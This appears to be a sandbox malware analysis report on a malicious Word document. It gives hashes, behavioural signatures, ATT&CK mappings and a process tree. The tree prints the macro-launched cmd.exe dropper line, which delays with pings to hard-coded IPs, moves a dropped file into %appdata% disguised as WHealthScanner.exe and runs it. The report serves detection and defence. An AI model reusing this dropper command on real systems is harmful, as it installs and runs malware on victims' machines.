Overview

overview

10

Static

static

8

53734CA399...AB.doc

windows7-x64

10

53734CA399...AB.doc

windows10-2004-x64

10

Resubmissions

23-03-2023 01:13

230323-bk51dace88 10

23-03-2023 01:09

230323-bjasvaee4y 10

Analysis

  • max time kernel
    149s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    23-03-2023 01:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    53734CA399DA5C4D5CF5D365C4F9A0AB.doc

  • Size

    168KB

  • MD5

    53734ca399da5c4d5cf5d365c4f9a0ab

  • SHA1

    f3059e3b29474051033ecf4efffb4015b4a25040

  • SHA256

    2407e90893f016d9ed760ed7b9ff5f89f542179af7229fd5c915b81a65862a62

  • SHA512

    27ac02db04b74487906c3ff74f1a9ea82f96b046e5ba387f63d0083f596ad547aafb44847885a3ca39d82ca4729d586ecc1f6833004869cd6498830be5c3eb9b

  • SSDEEP

    3072:Q0WVcyk7tzU4KoVDlaLNxBClQe5LzvyEW3q58c6D89Cmg62o+9m:xWV3k7lxKoVDlsNxBCz5LzvyEW3q58hQ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\53734CA399DA5C4D5CF5D365C4F9A0AB.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1228
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ping -n 13 194.170.189.177&pushd&forfiles /P %tmp% /S /M 5OHOp3SoB*.4PZ /C "cmd /c mkdir %appdata%\rY2oC&move /y @file %appdata%\rY2oC\WHealthScanner.exe&ping -n 20 166.193.61.63&pushd&%appdata%\rY2oC\WHealthScanner.exe"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 13 194.170.189.177
          3⤵
          • Runs ping.exe
          PID:1100

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Remote System Discovery

    1
    T1018

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      558145def09a0eeca72d04373800c3c5

      SHA1

      d97bf9a27cea81caa2ef14c5afa7c69cdc1adb6c

      SHA256

      4789422dd0d735a47404a355ed9592411922881e8e39427d9e4f1f69bbd02c38

      SHA512

      65054b4b9e639e56dc1b4598b7037eb3672f985fff4ec9d2e3ebc237e9878d207034024f0a9b595d0766c81bda6ab31a6387f711b62506c43cfcab255a27d89e

      Download Submit
    • memory/2004-73-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-66-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-60-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-74-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-62-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-63-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-64-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-75-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-65-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-67-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-68-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-70-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-69-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-77-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-72-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2004-61-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-59-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-71-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-76-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-85-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-86-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-87-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-88-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-89-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-90-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-91-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-93-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-92-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-94-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-95-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-58-0x0000000000740000-0x0000000000840000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/2004-111-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download